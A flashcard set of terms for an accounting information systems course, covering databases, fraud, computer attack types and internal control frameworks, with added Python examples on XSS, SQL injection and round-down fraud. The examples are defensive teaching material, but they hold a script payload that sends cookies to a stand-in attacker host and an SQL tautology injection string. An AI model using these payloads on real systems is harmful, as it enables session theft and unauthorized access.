Term
Ch. 1
Characteristics of a useful system |
|
Definition
Relevant, Reliable, Complete, Timely, Understandable, Verifiable, Accessible |
|
|
Term
Ch. 1
5 major business processes or transaction cycles |
|
Definition
- revenue
- expenditure
- production or conversion
- human resources/payroll
- financing
|
|
|
Term
Ch. 1
6 components of AIS |
|
Definition
- people
- procedures and instructions
- data
- software
- information technology infrastructure
- internal controls and security measures
|
|
|
Term
Ch. 1
3 business functions of AIS |
|
Definition
- collect and store data about org’s activities, resources, and personnel
- transform data into information so mgmt can plan, execute, control, and evaluate activities, resources, and personnel.
- provide adequate controls to safeguard the organization’s assets and data
|
|
|
Term
Ch. 1
How AIS adds value to an organization |
|
Definition
- improving the quality and reducing the costs of products or services
- improving efficiency
- sharing knowledge
- improving the efficiency and effectiveness of its supply chain
- improving the internal control structure
- improving decision making
|
|
|
Term
Ch. 1
Value chain of 5 primary activities that directly provide value to customers |
|
Definition
- inbound logistics (receive, store, distribute materials)
- operations (activities transforming inputs into final products or services)
- outbound logistics (activities to distribute finished products or services to customers)
- Marketing and sales (help customers buy the org’s products/services)
- Service (provide post-sale support to customers)
|
|
|
Term
Ch. 2
Data is collected about what three facets of each business activity? |
|
Definition
- each activity of interest
- the resources affected by each activity
- the people who participate in each activity
|
|
|
Term
Ch. 2
source documents |
Definition
used to collect data about a business activity |
|
|
Term
Ch. 2
turnaround documents |
|
Definition
company output sent to an external party, who often adds data to the document and returns it to the company as an input document. Help collect data and ensure they are accurate and complete. |
|
|
Term
Ch.2
source data automation device |
|
Definition
captures transaction data in machine-readable form at the time and place of their origin (ATMs, barcode scanners, etc). This is a way to collect data and ensure the data are accurate and complete. |
|
|
Term
Ch. 2
sequence codes |
|
Definition
items numbered consecutively to account for all items; any missing item causes a gap in the numerical sequence (prenumbered checks, invoices, POs, etc.). |
|
|
Term
Ch. 2
block codes |
Definition
blocks of numbers are reserved for specific categories of data; users can identify an item's type and model using the code of numbers (ex. general ledger account numbers-blocked by acct type, employee numbers-blocked by dept, customer numbers-blocked by region) |
|
|
Term
Ch. 2
group codes |
Definition
2 or more subgroups of digits used to code items, are often used in conjunction with block codes |
|
|
Term
Ch. 2
mnemonic codes |
Definition
letters and numbers are interspersed to identify an item; derived from the description of the item; easy to memorize |
|
|
Term
Ch. 2
chart of accounts |
Definition
list of the numbers assigned to each general ledger account |
|
|
Term
Ch. 2
entity |
Definition
something about which information is stored, such as employees, inventory items, and customers |
|
|
Term
Ch. 2
field |
|
Definition
contains data about one attribute of an entity; the set of fields describing one instance of an entity is a record |
|
|
Term
Ch. 2
database |
Definition
a set of interrelated, centrally coordinated files |
|
|
Term
Ch.2
4 types of data processing activities |
|
Definition
CRUD
- Creating - new data records
- Reading - retrieving, or viewing existing data
- Updating - previously stored data
- Deleting
|
|
|
Term
Ch. 2
batch processing |
|
Definition
updating done periodically (e.g., daily) by accumulating transactions into a batch, instead of processing each transaction as it occurs |
|
|
Term
Ch.2
online, real-time processing
|
|
Definition
ensures stored info is always current, thereby increasing its decision-making usefulness; also more accurate, since input errors can be detected and corrected at the time of entry; provides competitive advantage |
|
|
Term
Ch.2
Enterprise resource planning (ERP) systems |
|
Definition
integrate all aspects of a company's operations with a traditional AIS; ERP system collects, processes, and stores data and provides the information managers and external parties need to assess the company; ERPs are modular, with each module using best business practices to automate a standard business process; advantages and disadvantages on pg. 37 |
|
|
Term
Ch. 3
data flow diagram (DFD) |
|
Definition
graphically describes the flow of data within an organization;
uses four symbols: data sources/destinations (squares), data flows (arrows), transformation processes (circles), and data stores (two horizontal lines)
|
|
|
Term
Ch.3
Data sources/destinations |
|
Definition
data sources/destinations (square - entities that send or receive data that the system uses or produces) |
|
|
Term
Ch. 3
data flows |
|
Definition
arrows that represent data passing between processes, data stores, and sources/destinations; data cannot move directly between a data store and a source or destination without passing through a transformation process; each flow is labeled to show what data it carries |
|
|
Term
Ch. 3
context diagram |
|
Definition
highest-level DFD; provides a summary-level view of a system; depicts a data processing system and the entities that are the sources and destinations of system inputs and outputs. |
|
|
Term
Ch. 3
document flowchart |
Definition
illustrates the flow of documents and information among areas of responsibility within an organization; trace documents from cradle to grave showing where each document originates, its distribution, its purpose, its disposition, and everything that happens as it flows through the system |
|
|
Term
Ch.3
internal control flowcharts |
|
Definition
document flowchart that describes and evaluates internal controls |
|
|
Term
Ch. 3
system flowchart |
Definition
depicts relationships among system input, processing, and output; an important systems analysis, design, and evaluation tool. |
|
|
Term
Ch. 3
program flowchart |
|
Definition
illustrates the sequence of logical operations performed by a computer in executing a program |
|
|
Term
Ch.4
Database management system (DBMS) |
|
Definition
the interface between the database and the various application programs. |
|
|
Term
Ch. 4
database system |
Definition
the database, the DBMS, and the application programs that access the database through the DBMS. |
|
|
Term
Ch.4
Database administrator (DBA) |
|
Definition
responsible for coordinating, controlling, and managing the database |
|
|
Term
Ch.4
business intelligence |
|
Definition
using a data warehouse for strategic decision making. (data warehouse=both detailed and summarized data for a number of years and is used for analysis rather than transaction processing; updated periodically.) |
|
|
Term
Ch.4
online analytical processing (OLAP) |
|
Definition
using queries to guide the investigation of hypothesized relationships in data; “drilling down” to lower levels |
|
|
Term
Ch. 4
data mining |
Definition
using sophisticated statistical analysis, including AI techniques such as neural networks, to “discover” unhypothesized relationships in the data. |
|
|
Term
Ch. 4
benefits of databases |
|
Definition
- data integration
- data sharing
- minimal data redundancy and data inconsistencies
- data independence
- cross-functional analysis
|
|
|
Term
Ch. 4
logical view of a database |
|
Definition
how people conceptually organize and understand the data |
|
|
Term
Ch. 4
physical view of a database |
|
Definition
how and where data are physically arranged and stored in the computer system |
|
|
Term
Ch. 4
schema |
Definition
logical structure of a database
3 levels: conceptual, external, and internal |
|
|
Term
Ch. 4
Conceptual-level schema |
|
Definition
organization wide view of the entire database, lists all data elements and the relationships among them |
|
|
Term
Ch. 4
external-level schema |
|
Definition
individual user views of portions of the database, each of which is referred to as a subschema |
|
|
Term
Ch. 4
internal-level schema |
|
Definition
low-level view of the database, describes how the data are stored and accessed, including record layouts, definitions, addresses, and indexes. |
|
|
Term
Ch. 4
data dictionary |
Definition
contains information about the structure of the database. |
|
|
Term
Ch. 4
Data definition language |
|
Definition
a DBMS language that builds the data dictionary, creates the database, describes logical views for each user, and specifies records or field security constraints. |
|
|
Term
Ch. 4
data manipulation language |
|
Definition
changes database content, including data element updates, insertions, and deletions. |
|
|
Term
Ch. 4
data query language |
|
Definition
contains powerful, easy-to-use commands that enable users to retrieve, sort, order, and display data. |
|
|
Term
Ch. 4
data model |
Definition
abstract representation of database contents, upon which the DBMS is built. |
|
|
Term
Ch. 4
primary key (for a database) |
|
Definition
the database attribute, or combination of attributes, that uniquely identifies a specific row in a table |
|
|
Term
Ch. 4
foreign key |
Definition
an attribute that is a primary key in another table, it’s used to link tables. |
|
|
Term
Ch. 5
fraud |
|
Definition
gaining an unfair advantage over another person. Legally, for an act to be fraudulent there must be:
- a false statement, representation, or disclosure
- a material fact
- an intent to deceive
- a justifiable reliance (the victim relies on the misrepresentation to take an action)
- an injury or loss suffered by the victim
|
|
|
Term
Ch. 5
4 actions from the Treadway Commission to reduce fraudulent financial reporting
|
|
Definition
- establish an org environment that contributes to the integrity of the financial reporting process
- identify and understand the factors that lead to fraudulent financial reporting
- assess the risk of fraudulent financial reporting within the company
- design and implement internal controls to provide reasonable assurance of preventing fraudulent financial reporting
|
|
|
Term
Ch. 5
fraud triangle |
Definition
- pressure=person’s incentive/motivation for committing fraud; three types are financial, lifestyle, and emotional
- opportunity=condition or situation that allows a person or organization to do three things: commit the fraud, conceal the fraud, and convert the theft to personal gain
- rationalization=allows people to justify their behavior
|
|
|
Term
Ch. 5
types of computer fraud |
|
Definition
- input
- processor=unauthorized system use
- computer instructions=tampering with company software, copying software illegally, using it in an unauthorized manner, and developing software to carry out an unauthorized activity.
- data=illegally using, copying, browsing, searching, or harming company data.
- output
|
|
|
Term
Ch. 5
ways to prevent, detect, reduce |
|
Definition
|
|
Term
Ch. 6
hacking |
Definition
the unauthorized access, modification, or use of an electronic device or some elements of a computer system |
|
|
Term
Ch. 6
botnet |
|
Definition
robot network; a network of hijacked computers (zombies) under an attacker's remote control, powerful and dangerous because it can be pointed at a target all at once |
|
|
Term
Ch. 6
hijacking |
Definition
gaining control of a computer to carry out illicit activities without the user’s knowledge |
|
|
Term
Ch. 6
bot herder |
|
Definition
installs software that responds to the hacker's electronic instructions onto unwitting PCs, turning them into zombies |
|
|
Term
Ch. 6
denial-of-service attack |
|
Definition
botnets are used for this; designed to make a resource unavailable to its users |
|
|
Term
Ch. 6
dictionary attack |
Definition
(direct harvesting attacks); staged by spammers; use special software to guess addresses at a company and send blank e-mail messages; those not returned are probably real, so they’re added to a spam list |
|
|
Term
Ch. 6
spoofing |
Definition
making an electronic communication look as if someone else sent it to gain the trust of the recipient |
|
|
Term
Ch. 6
e-mail spoofing |
Definition
making an email appear as though it originated from a different source |
|
|
Term
Ch. 6
caller ID spoofing |
Definition
displaying an incorrect number on a caller ID display to hide the caller’s identity |
|
|
Term
Ch. 6
IP address spoofing |
|
Definition
creating IP packets with forged source IP addresses to conceal the identity of the sender or to impersonate another computer system (used for DoS attacks) |
|
|
Term
Ch. 6
address resolution protocol (ARP) spoofing |
|
Definition
sending fake ARP messages to an Ethernet LAN so that hosts associate another machine's IP address with the attacker's MAC address, letting the attacker intercept or redirect traffic meant for that machine. |
|
|
Term
Ch. 6
SMS spoofing |
Definition
using the short message service SMS to change the name or number a text message appears to come from |
|
|
Term
Ch. 6
DNS spoofing |
Definition
sniffing the ID of a domain name system request and replying before the real DNS server can. |
|
|
Term
Ch. 6
zero-day attack |
|
Definition
an attack between the time a new software vulnerability is discovered and the time the software developer releases a patch that fixes the problem |
|
|
Term
Ch. 6
Cross-site scripting (XSS) |
|
Definition
a vulnerability in dynamic web pages that lets an attacker inject script into content the site serves; the victim's browser runs it as though it came from the trusted site, so same-origin protections do not apply and the script can read cookies or act as the user. |
|
|
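Added example (not from the textbook or this card set): a Python rendering of a user comment with and without output encoding, so the XSS mechanism on the card is visible. The comment payload, page template and the detection regex are constructed for this illustration.

```python
import html
import re

# Constructed sample input (not from the page): a comment that carries a script
# which would ship the victim's cookies to an attacker-controlled host.
MALICIOUS_COMMENT = (
    '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>'
)


def render_vulnerable(comment: str) -> str:
    # Untrusted text is spliced straight into the page. Any markup in it becomes
    # part of the DOM and any script in it runs with the trusted site's origin,
    # so the browser's same-origin protections do not help the victim.
    return f"<p class='comment'>{comment}</p>"


def render_safe(comment: str) -> str:
    # Output encoding for an HTML text context: <, >, &, and quotes become
    # entities, so the browser renders the characters instead of parsing them.
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    # Detection check on the rendered output: does an unescaped <script tag survive?
    return bool(SCRIPT_TAG.search(page))
```

Escaping has to match the output context: `html.escape` is correct for HTML text and attribute values, not for data placed inside JavaScript or URLs. A templating engine with auto-escaping is the durable fix; a Content-Security-Policy header is defense in depth, not a substitute.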
Term
Ch. 6
buffer overflow attack |
|
Definition
happens when the amount of data entered into a program is greater than the amount of memory set aside to receive it; the excess overwrites adjacent memory, which can crash the program or, if the overwritten bytes include return addresses or code pointers, let the attacker run code of their choosing. |
|
|
Term
Ch. 6
SQL injection attack |
|
Definition
malicious input crafted so that, when an application builds an SQL query by concatenating it into the query text, the input is interpreted as SQL rather than data and is executed by the database; defeated by parameterized queries that keep data and query structure separate. |
|
|
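Added example (not from the textbook or this card set): the same login check written with string concatenation and with a parameterized query, run against an in-memory SQLite table. The table, users and payload are constructed here; passwords are stored in plaintext only to keep the injection itself visible, which is not how a real system should store them.

```python
import sqlite3

# Constructed sample data (not from the page): a minimal users table.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, name: str, password: str) -> bool:
    # Input is concatenated into the query text, so a quote in the input ends
    # the string literal and whatever follows is parsed as SQL.
    query = (
        f"SELECT COUNT(*) FROM users WHERE name = '{name}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn, name: str, password: str) -> bool:
    # Parameterized query: the driver passes the input as bound data, so it can
    # never change the structure of the statement.
    query = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone()[0] > 0


def demo() -> dict:
    conn = make_db()
    payload = "' OR '1'='1"  # classic tautology: ... AND password = '' OR '1'='1'
    return {
        "vuln_legit": login_vulnerable(conn, "alice", "s3cret"),
        "vuln_injected": login_vulnerable(conn, "alice", payload),
        "safe_legit": login_safe(conn, "alice", "s3cret"),
        "safe_injected": login_safe(conn, "alice", payload),
    }
```

The vulnerable version accepts the payload as a valid password because the tautology makes the WHERE clause true for every row; the parameterized version compares the literal string and rejects it.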
Term
Ch. 6
Man-in-the-middle attack |
|
Definition
places the attacker between a client and a host so all traffic between them can be intercepted, read, or altered. The basis of session hijacking; also used against public-key encryption when the parties cannot verify whose public key they received, since the attacker can substitute their own key and decrypt the sensitive info passed back and forth. |
|
|
Term
Ch. 6
Masquerading/impersonation |
|
Definition
pretending to be an authorized user to access a system |
|
|
Term
Ch. 6
piggybacking |
|
Definition
- clandestine use of a neighbor's Wi-Fi network
- tapping into a telecommunications line and electronically latching onto a legitimate user before the user enters a secure system
- an unauthorized person following an authorized person through a secure door, bypassing physical security controls such as keypads, ID cards, etc.
|
|
|
Term
Ch. 6
password cracking |
|
Definition
penetrating a system's defenses, stealing the file containing the password hashes, recovering the passwords from the hashes (by dictionary or brute-force guessing, or by decrypting them where they were stored reversibly), and using them to gain access to programs, files, and data |
|
|
Term
Ch. 6
war dialing |
Definition
programming a computer to dial thousands of phone lines searching for dial-up modem lines. hackers hack the PC attached to the modem and access the network to which it is connected. |
|
|
Term
Ch. 6
war rocketing |
Definition
using rockets to let loose wireless access points attached to parachutes that detected unsecured wireless networks in an area. |
|
|
Term
Ch. 6
data diddling |
Definition
changing data before, during, or after it is entered into the system in order to delete, alter, add, or incorrectly update key system data. |
|
|
Term
Ch. 6
data leakage |
Definition
the unauthorized copying of company data |
|
|
Term
Ch. 6
podslurping |
Definition
using a small device with storage capacity to download unauthorized data |
|
|
Term
Ch. 6
salami technique |
Definition
used to embezzle money a “salami slice” at a time from many different accounts. |
|
|
Term
Ch. 6
round-down fraud |
Definition
all interest calculations are truncated at 2 decimal places and the excess decimals are put into another account set up by the perpetrator. |
|
|
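Added example (not from the textbook or this card set): the salami and round-down cards in code. Interest is posted two ways, truncating (the fraud) and correctly rounding, and an independent recomputation flags the accounts whose credited amount does not match. The balances and rate are constructed for this illustration.

```python
from decimal import Decimal, ROUND_DOWN, ROUND_HALF_EVEN

CENT = Decimal("0.01")

# Constructed sample data (not from the page): four account balances and a
# 3.75% annual rate applied monthly.
BALANCES = [Decimal("1234.56"), Decimal("8765.43"), Decimal("250.00"), Decimal("99999.99")]
MONTHLY_RATE = Decimal("0.0375") / 12  # exactly 0.003125


def interest_exact(balance: Decimal) -> Decimal:
    return balance * MONTHLY_RATE


def post_interest_truncating(balances):
    """The fraud: credit each customer the truncated interest and keep the
    fractional cents. Returns (credited amounts, total skimmed)."""
    credited, skimmed = [], Decimal("0")
    for balance in balances:
        exact = interest_exact(balance)
        truncated = exact.quantize(CENT, rounding=ROUND_DOWN)
        credited.append(truncated)
        skimmed += exact - truncated  # the slice diverted to the perpetrator's account
    return credited, skimmed


def post_interest_rounding(balances):
    """The honest posting: bankers' rounding, with the unavoidable residue
    tracked explicitly so it can be booked rather than pocketed."""
    credited, residue = [], Decimal("0")
    for balance in balances:
        exact = interest_exact(balance)
        rounded = exact.quantize(CENT, rounding=ROUND_HALF_EVEN)
        credited.append(rounded)
        residue += exact - rounded
    return credited, residue


def recompute_check(balances, credited):
    """Detective control (independent recomputation): every credited amount
    must equal the correctly rounded interest. Returns the indices that do not."""
    return [
        i for i, (balance, amount) in enumerate(zip(balances, credited))
        if amount != interest_exact(balance).quantize(CENT, rounding=ROUND_HALF_EVEN)
    ]
```

Per account the diverted amount is under a cent, which is why the scheme relies on volume; the recomputation catches it because truncation biases every result in one direction, while honest rounding errors are tiny and cancel.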
Term
Ch. 6
economic espionage |
Definition
theft of information, trade secrets, and intellectual property |
|
|
Term
Ch. 6
cyber-extortion |
Definition
threatening to harm a company or person if a specified amount of money isn’t paid |
|
|
Term
|
Definition
seriously? why is this in our textbook? |
|
|
Term
Ch. 6
internet terrorism |
Definition
the act of disrupting electronic commerce and harming computers and communications |
|
|
Term
Ch. 6
internet misinformation |
|
Definition
using the internet to spread false or misleading info |
|
|
Term
Ch. 6
internet pump-and-dump |
|
Definition
fraud using the internet to pump up the price of a stock and then selling it. |
|
|
Term
Ch. 6
click fraud |
Definition
manipulating click numbers to inflate advertising bills |
|
|
Term
Ch. 6
web cramming |
|
Definition
offering a free web site for a month, developing a worthless web site, and charging the phone bill of the people who accept the offer for months, whether they want to continue using the site or not. |
|
|
Term
Ch. 6
software piracy |
|
Definition
the unauthorized copying or distribution of copyrighted software |
|
|
Term
Ch. 6
social engineering |
|
Definition
techniques or psychological tricks used to get people to comply with the perpetrator's wishes in order to gain physical or logical access to a building, computer, server, or network. |
|
|
Term
Ch. 6
pretexting |
Definition
using an invented scenario to increase the likelihood that a victim will divulge info or do something. |
|
|
Term
Ch. 6
posing |
Definition
creating a seemingly legit business, collecting personal info while making a sale, and never delivering the product |
|
|
Term
Ch. 6
phishing |
|
Definition
sending an electronic message pretending to be a legit company, usually a financial institution, requesting info or verification of info and often warning of some dire consequence if it is not provided. |
|
|
Term
Ch. 6
vishing |
Definition
like phishing except that the victim enters confidential data by phone. |
|
|
Term
Ch. 6
carding |
Definition
activities performed on stolen credit cards, including making a small online purchase to determine if the card is still valid, and buying/selling stolen credit card numbers |
|
|
Term
Ch. 6
pharming |
|
Definition
redirecting web site traffic to a spoofed web site. |
|
|
Term
Ch. 6
evil twin |
Definition
a wireless network with the same name as a legit wireless access point. |
|
|
Term
Ch. 6
typosquatting / URL hijacking |
Definition
setting up similarly named web sites so users making typographical errors are sent to an invalid site. |
|
|
Term
Ch. 6
tabnapping |
Definition
secretly changing an already open browser tab |
|
|
Term
Ch. 6
scavenging/dumpster diving |
|
Definition
gaining access to confidential info by searching documents and records. |
|
|
Term
Ch. 6
shoulder surfing |
Definition
perpetrators look over a person’s shoulder in a public place to get info like ATM PINs etc. |
|
|
Term
Ch. 6
Lebanese looping |
Definition
perp inserts a sleeve into an ATM that prevents the ATM from ejecting the card. When it is obvious the card is trapped, the perp approaches the victim and pretends to help, tricking the person into entering their PIN again. when the person gives up the thief removes the card and gets money. |
|
|
Term
Ch. 6
skimming |
Definition
double-swiping a credit card in a legit terminal or swiping it in a hidden one that records the credit card data for later use. |
|
|
Term
Ch. 6
chipping |
Definition
posing as a service engineer and planting a small chip that records transaction data in a legit credit card reader. |
|
|
Term
Ch. 6
malware |
Definition
any software that can be used to do harm. |
|
|
Term
Ch. 6
spyware |
|
Definition
software that secretly monitors and collects personal info about users and sends it to someone else. |
|
|
Term
Ch. 6
adware |
Definition
spyware that pops banner ads on a monitor, collects info about the user’s web surfing and spending habits, and forwards it to the adware creator. |
|
|
Term
Ch. 6
torpedo software |
Definition
destroys competing malware, resulting in malware warfare between competing developers. |
|
|
Term
Ch. 6
scareware |
Definition
software that’s often malicious and of little or no benefit that is sold using scare tactics. |
|
|
Term
Ch. 6
ransomware |
|
Definition
software that locks users out of their programs and data, typically by encrypting them, and demands payment for their return; often delivered disguised as fake antivirus software. The textbook's note that it is rare because payments are easy to trace is out of date: payment in cryptocurrency has made it one of the most common attacks. |
|
|
Term
Ch. 6
key logging software |
|
Definition
records computer activity, such as a user’s keystrokes, emails sent and received, web sites visited, etc. |
|
|
Term
Ch. 6
trojan horse |
|
Definition
set of malicious computer instructions hidden in an authorized and otherwise properly functioning program. Unlike viruses and worms, it does not try to replicate itself. |
|
|
Term
Ch. 6
time bomb/logic bomb |
|
Definition
trojan horses that lie idle until triggered by a specified date or time, by a change in the system, by a message sent to the system, or by an event that doesn’t occur. once triggered it destroys programs and data. |
|
|
Term
Ch. 6
trap door/back door |
|
Definition
way into the system that bypasses normal authorization controls. |
|
|
Term
Ch. 6
packet sniffers |
|
Definition
capture data from info packets as they travel over networks; captured data are examined to find confidential or proprietary info. |
|
|
Term
Ch. 6
steganography programs |
|
Definition
hide data files inside a host file, such as a large image or sound file; typically the software overwrites the least significant bits of scattered bytes in the host file with bits of the hidden file, so the host still looks or sounds normal while carrying the hidden data. |
|
|
Term
Ch. 6
rootkit |
Definition
conceals processes, files, network connections, memory addresses, systems utility programs, and system data from the operating system and other programs. often modify the operating system or install themselves as drivers. they’re used to hide the presence of trap doors, sniffers, and key loggers etc. |
|
|
Term
Ch. 6
superzapping |
Definition
the unauthorized use of special system programs to bypass regular system controls and perform illegal acts, all without leaving an audit trail. |
|
|
Term
Ch. 6
virus |
|
Definition
segment of self-replicating, executable code that attaches itself to a file or program; spreads to other systems when the infected file is shared and opened there. Some mutate to evade detection. |
|
|
Term
Ch. 6
worm |
|
Definition
self-replicating computer program like a virus except: 1. a worm is a stand-alone program, not a segment of code attached to something. 2. worms actively seek to send copies of themselves to other network devices, whereas viruses require a human to do something to spread. 3. worms harm networks (consuming bandwidth and hosts), whereas viruses infect or corrupt files and data on a targeted computer. |
|
|
Term
Ch. 6
bluesnarfing |
Definition
stealing contact lists, images and other data using bluetooth |
|
|
Term
Ch. 6
bluebugging |
Definition
taking control of someone else’s phone to make or listen to calls, send or read texts, connect to the internet, forward the victim’s calls, etc. |
|
|
Term
Ch. 7
internal control |
Definition
the process implemented to provide reasonable assurance that control objectives are achieved |
|
|
Term
Ch. 7
Three functions of internal controls |
|
Definition
- preventive controls
- detective controls
- corrective controls
|
|
|
Term
Ch. 7
preventive controls |
|
Definition
deter problems before they arise (hire qualified personnel, segregate duties, control physical assets/info) |
|
|
Term
Ch. 7
detective controls |
Definition
discover problems that aren’t prevented (duplicate checking of calculations) |
|
|
Term
Ch. 7
corrective controls |
|
Definition
identify and correct problems as well as correct and recover from the resulting errors (maintain backups, correct data entry errors) |
|
|
Term
Ch. 7
Two categories of internal controls |
|
Definition
- General Controls (make sure an org’s control environment is stable and well maintained)
- Application Controls (make sure transactions are processed correctly; concerned with accuracy, completeness, validity, and authorization of the data captured, entered, processed, stored, transmitted to other systems, and reported.)
|
|
|
Term
Ch. 7
foreign corrupt practices act |
|
Definition
passed to prevent companies from bribing foreign officials to obtain business; also requires companies to keep accurate records and maintain a system of internal accounting controls. |
|
|
Term
Ch. 7
COBIT framework addresses control from 3 vantage points |
|
Definition
- Business objectives (info must conform to seven categories of criteria that map into the objectives established by COSO)
- IT resources=people, application systems, tech, facilities, and data
- IT processes=four domains: planning/organization, acquisition/implementation, delivery/support, monitoring/evaluation
|
|
|
Term
Ch. 7
COSO (Committee of Sponsoring Organizations) |
Definition
consists of the AAA, AICPA, IIA, IMA, and FEI. |
|
|
Term
Ch. 7
Internal Control-Integrated Framework |
|
Definition
issued by COSO; widely accepted as the authority on internal controls. |
|
|
Term
Ch. 7
5 components of COSO’s IC framework |
|
Definition
- control environment
- control activities
- risk assessment
- info and communication
- monitoring
|
|
|
Term
Ch. 7
Enterprise Risk Management-Integrated Framework
|
|
Definition
developed by COSO as a second control framework; ERM is the process the BoD and mgmt use to set strategy, identify events that may affect the entity, assess and manage risk, and provide reasonable assurance that the company achieves its objectives and goals. |
|
|
Term
Ch. 7
ERM model components |
|
Definition
- internal environments
- objectives setting
- event identification
- risk assessment
- risk response
- control activities
- info & communication
- monitoring
|
|
|
Term
Ch. 7
what does an internal environment consist of? |
|
Definition
- mgmts’s philosophy, operating style, and risk appetite
- the board of directors (audit committee)
- commitment to integrity, ethical values, and competence
- organizational structure
- methods of assigning authority and responsibility
- human resource standards (hiring, compensating/evaluating/promoting, training, managing disgruntled employees, discharging, vacations/rotations, confidentiality agreements, prosecute/incarcerate perps)
- external influences (FASB, PCAOB, SEC etc)
|
|
|
Term
Ch. 7
ERM objective types |
|
Definition
- strategic
- operations
- reporting
- compliance
|
|
|
Term
Ch. 7
inherent risk |
Definition
exists before mgmt takes any steps to control the likelihood or impact of an event |
|
|
Term
Ch. 7
residual risk |
|
Definition
what remains after mgmt implements internal controls or some other risk response |
|
|
Term
Ch. 7
risk responses |
|
Definition
- reduce (by implementing an effective system of internal controls)
- accept (the likelihood and impact of the risk)
- share (or transfer it to someone else by buying insurance, outsourcing, or hedging)
- avoid (don’t engage in the activity that produces the risk)
|
|
|
Term
Ch. 7
expected loss |
Definition
used to estimate the value of internal controls; Expected Loss=Impact x likelihood |
|
|
Term
Ch. 7
7 Control procedure categories |
|
Definition
- proper authorization of transactions and activities
- segregation of duties
- project development and acquisition controls
- change mgmt controls
- design and use of documents and records
- safeguarding assets, records, and data
- independent checks on performance
|
|
|
Term
Ch. 7
specific authorization |
|
Definition
certain activities/transactions that are of such consequence that mgmt has to authorize them |
|
|
Term
Ch. 7
general authorization |
|
Definition
authorizes employees to handle routine transactions without special approval |
|
|
Term
Ch. 7
segregation of accounting duties |
|
Definition
- authorization
- recording
- custody
|
|
|
Term
Ch. 7
segregation of system duties |
|
Definition
- system admin
- network mgmt
- security mgmt
- change mgmt
- users
- systems analysis
- programming
- computer operations
- info system library
- data control
|
|
|
Term
Ch. 7
systems integrator |
Definition
manages a systems development effort involving its own personnel, its client, and other vendors. |
|
|
Term
Ch. 7
Computer security officer |
|
Definition
in charge of system security, independent of the info system function |
|
|
Term
Ch. 8
7 IT controls criteria in the COBIT framework
|
|
Definition
- effectiveness (relevant, timely info)
- efficiency (info must be produced in a cost-effective manner)
- confidentiality (sensitive information must be protected)
- integrity (info must be accurate, complete, and valid)
- availability (info must be available whenever needed)
- compliance (ensure compliance with internal and external policies/requirements)
- reliability (mgmt must have access to appropriate info needed to conduct daily activities etc.)
|
|
|
Term
Ch. 8
4 Management domains (basic mgmt activities for COBIT) |
|
Definition
- Plan and Organize (define IT plan, determine tech direction, manage IT investment, communicate mgmt aims/direction etc.)
- Acquire and Implement (acquire and maintain application software/tech infrastructure, procure it resources, manage changes, etc.)
- Deliver and Support (define/manage service levels, ensure system security, manage problems/data/physical environment/operations, etc.)
- Monitor and Evaluate (IT performance & internal control, ensure compliance with external requirements, provide IT governance)
|
|
|
Term
Ch. 8
2 fundamental info security concepts |
|
Definition
- security is a management issue, not a technology issue
- defense-in-depth and time-based model of info security
|
|
|
Term
Ch. 8
defense-in-depth |
Definition
use multiple layers of controls; involve preventive, detective, and corrective controls |
|
|
Term
Ch. 8
time-based model of security |
|
Definition
P=time it takes an attack to break through preventive controls
D=time it takes to detect an attack is in progress
C=time it takes to respond to the attack
if P>D+C then security procedures are effective. |
|
|
Term
Ch. 8
Preventive controls |
|
Definition
- training
- user access controls
- physical access controls
- network access controls
- device/software hardening controls
|
|
|
Term
Ch. 8
user access controls |
|
Definition
authentication (something they know, something they have, some physical characteristic), authorization (for access to certain portions of a system) |
|
|
Term
Ch. 8
access control matrix |
|
Definition
a way to implement authorization controls; when an employee attempts to access a particular info system resource, the system performs a compatibility test that matches the user's authentication credentials against the access control matrix and denies anything the matrix does not explicitly permit. |
|
|
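Added example (not from the textbook or this card set): an access control matrix as a dictionary, the compatibility test that consults it with default deny, and a review check over the same matrix for segregation-of-duties conflicts (the authorization/recording/custody split from the Ch. 7 cards). Users, resources and action names are constructed for this illustration.

```python
# Constructed example (not from the page): an access control matrix mapping
# users x resources -> the set of actions each user may perform.
ACCESS_MATRIX = {
    "alice": {"payroll_master": {"read", "update"}, "gl_journal": {"read"}},
    "bob":   {"gl_journal": {"read", "create"}},
    "carol": {"payroll_master": {"read"}},
    # Deliberate segregation-of-duties violation for the review check below.
    "dave":  {"vendor_master": {"create", "approve"}},
}

# Action pairs no single user should hold on the same resource: recording a
# transaction and authorizing it must sit with different people.
SOD_CONFLICTS = [("create", "approve"), ("update", "approve")]


def is_authorized(matrix, user, resource, action) -> bool:
    # Compatibility test: permitted only if the matrix explicitly grants this
    # action; unknown users, resources or actions fall through to deny.
    return action in matrix.get(user, {}).get(resource, set())


def authorize_request(matrix, user, resource, action, audit_log) -> bool:
    # Every decision is logged so detective controls (log analysis) can see
    # denied attempts, not just successful access.
    decision = is_authorized(matrix, user, resource, action)
    audit_log.append((user, resource, action, "ALLOW" if decision else "DENY"))
    return decision


def sod_conflicts(matrix, conflicts=SOD_CONFLICTS):
    # Review control over the matrix itself: (user, resource) pairs where one
    # person holds both halves of a conflicting action pair.
    found = []
    for user, grants in matrix.items():
        for resource, actions in grants.items():
            if any(a in actions and b in actions for a, b in conflicts):
                found.append((user, resource))
    return found
```

The matrix answers "may this user do this now"; the conflict scan answers "should anyone have been granted this combination at all", which is the question an auditor asks when reviewing the matrix.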
Term
Ch. 8
network access controls |
|
Definition
perimeter defense: routers, firewalls, intrusion prevention systems |
|
|
Term
Ch. 8
border router |
Definition
connects an org’s info system to the internet |
|
|
Term
Ch. 8
firewall |
Definition
a special-purpose hardware device or software running on a general-purpose computer |
|
|
Term
Ch. 8
demilitarized zone (DMZ) |
Definition
separate network that permits controlled access from the Internet to selected resources. |
|
|
Term
Ch. 8
Transmission Control Protocol |
|
Definition
specifies the procedures for dividing files and documents into packets to be sent over the internet and the methods for reassembly of the original document or file at the destination |
|
|
Term
Ch. 8
Internet Protocol (IP) |
Definition
